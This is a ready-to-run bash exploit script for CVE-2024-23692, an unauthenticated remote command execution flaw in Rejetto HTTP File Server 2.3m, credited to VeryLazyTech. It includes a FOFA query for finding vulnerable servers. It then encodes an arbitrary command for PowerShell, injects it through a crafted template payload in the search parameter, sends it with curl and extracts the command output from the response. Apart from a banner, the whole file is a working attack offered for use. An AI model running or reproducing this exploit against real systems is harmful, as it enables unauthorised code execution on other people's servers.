CVE-2024-23692.sh

# CVE-2024-23692 Unauthenticated RCE Flaw in Rejetto HTTP File Server
# FOFA "HttpFileServer" && server=="HFS 2.3m"
# Medium https://medium.com/@verylazytech

#!/usr/bin/env bash


banner() {
cat <<'EOF'
  ______     _______   ____   ___ ____  _  _     ____  _____  __   ___ ____  
 / ___\ \   / / ____| |___ \ / _ \___ \| || |   |___ \|___ / / /_ / _ \___ \ 
| |    \ \ / /|  _|     __) | | | |__) | || |_    __) | |_ \| '_ \ (_) |__) |
| |___  \ V / | |___   / __/| |_| / __/|__   _|  / __/ ___) | (_) \__, / __/ 
 \____|  \_/  |_____| |_____|\___/_____|  |_|   |_____|____/ \___/  /_/_____|
                                                                             
__     __                _                      _____         _     
\ \   / /__ _ __ _   _  | |    __ _ _____   _  |_   _|__  ___| |__  
 \ \ / / _ \ '__| | | | | |   / _` |_  / | | |   | |/ _ \/ __| '_ \ 
  \ V /  __/ |  | |_| | | |__| (_| |/ /| |_| |   | |  __/ (__| | | |
   \_/ \___|_|   \__, | |_____\__,_/___|\__, |   |_|\___|\___|_| |_|
                 |___/                  |___/                       
                    

                    @VeryLazyTech - Medium
                    
EOF

}

# Call the banner function
banner

set -e

# Check for correct number of arguments
if [ "$#" -ne 2 ]; then
    printf "Usage: $0 <url> <command>"
    exit 1
fi

commands=$(echo "echo [S]; $2; echo [S];" | iconv -t UTF-16LE | base64 -w 0)
payload="/?n=%0A&cmd=cmd+/c+powershell+-enc+$commands&search=%25xxx%25url%25:%password%\}\{.exec|\{.?cmd.\}|timeout=15|out=abc.\}\{.?n.\}\{.?n.\}RESULT:\{.?n.\}\{.^abc.\}====\{.?n.\}"

url=$1$payload

printf "\033[0;32mTrying to exploit... Just a sec\033[0m"

response=$(curl -s -X GET "$url")

result=$(echo "$response" | awk 'BEGIN {found=0} /\[S\]/ {if (found == 0) {found=1; next} else {exit}} found {print}')

# Output the result
printf "[\033[0;32m*\033[0m]" $(date "+%Y-%m-%d %H:%M:%S") " \n[\033[0;32m*\033[0m] Output: \n"
printf "$result"
printf "\n"